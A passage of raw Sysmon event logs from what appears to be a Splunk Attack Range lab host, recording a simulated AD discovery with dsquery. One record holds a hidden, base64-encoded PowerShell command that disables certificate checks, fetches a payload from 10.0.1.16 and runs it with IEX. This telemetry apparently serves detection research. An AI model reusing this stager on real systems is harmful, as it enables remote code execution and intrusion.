Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FB8273017C754C7F47CD3FA84894A6,SHA256=A5D0729CB606570EF763018BD17351E57D27099FCF7AEF1A2BE8CC4C80BF7C2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:05.495{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AE7BAD209821B83F737820A33E23316,SHA256=23DF514F2AD800454D82177C4A9C7416B6A0586E7CD9586B472C1BD0FAE9B4CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000035128579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.926{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\System32\dsquery.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035128578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.910{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.910{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.910{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.910{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.894{B81B27B7-4013-611D-1600-00000000C801}11963536C:\Windows\system32\svchost.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.894{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.861{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.858{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.857{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.857{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.857{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.841{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.841{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\system32\dsquery.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.856{B81B27B7-83AA-613A-DD96-03000000C801}6128C:\Windows\System32\dsquery.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft AD DS/LDS query command line utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationdsquery.exe"C:\Windows\system32\dsquery.exe" groupC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=0F173F934D6FED9B140763559F70DF65,SHA256=3201CC050F642D0B3AD759EDCF57287082200831A258FBC2F17B4C96B53A28A7,IMPHASH=D442E29184F60B794AD2B7508D569FC3{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035128564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:06.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769F26CC7319A6A9EB6ADAAF4200D70C,SHA256=F6F267FDD684F7CE6314BE03534157AEF0D2E8A73E370F63ECA21E6644CAD503,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:32.340{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62176-false10.0.1.12-8000- 23542300x800000000000000035128583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:07.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D2681BB9C19B88F1A6D8F0800CB0A427,SHA256=AE927258BECE49CAF00FA9D19519C4FE6E0A2758D31F1E0A7855D2C5FDDABD34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:07.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BBABD3F1D691F338B4D5BC78E174499,SHA256=1A9B4E24F45504FF71E7D94D6FEFDE4A39DFAFD3AD6AD1E2F1FD1A975940DEC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:07.867{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02884E933425682347DF68D4FCA53C54,SHA256=8F29689C54AC205EEDF1AA604943AACBBADA19E04EB85D32C8D8AAE3AD574CB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:07.532{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703A9ED2349846D0F5868E4DE4F8D9C9,SHA256=A0939BD993C1A49EC1E60133B5E006D7244CBA906457C2E4AB4A9D5F76F63505,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000035128586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:33.104{00000000-0000-0000-0000-000000000000}6128win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035128585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:08.568{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95059D8C2AB89CAE7ADE7EE587708EEC,SHA256=5354E57B66F5A6CF58C0A503BBFBEC0288FB4AC6E6B2B9A87151EA0A4C8911CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:09.583{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1D622965763BCBBDEFC9FDCEFEFEB7A,SHA256=8A1550EF1418CE94E1DC4E2507E57E1E6481641AF82B44849522E071A5E6ABEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:33.105{00000000-0000-0000-0000-000000000000}6128<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local62178-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035128587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:33.017{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62177-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035128609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.798{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83AE-613A-DF96-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.798{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.798{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 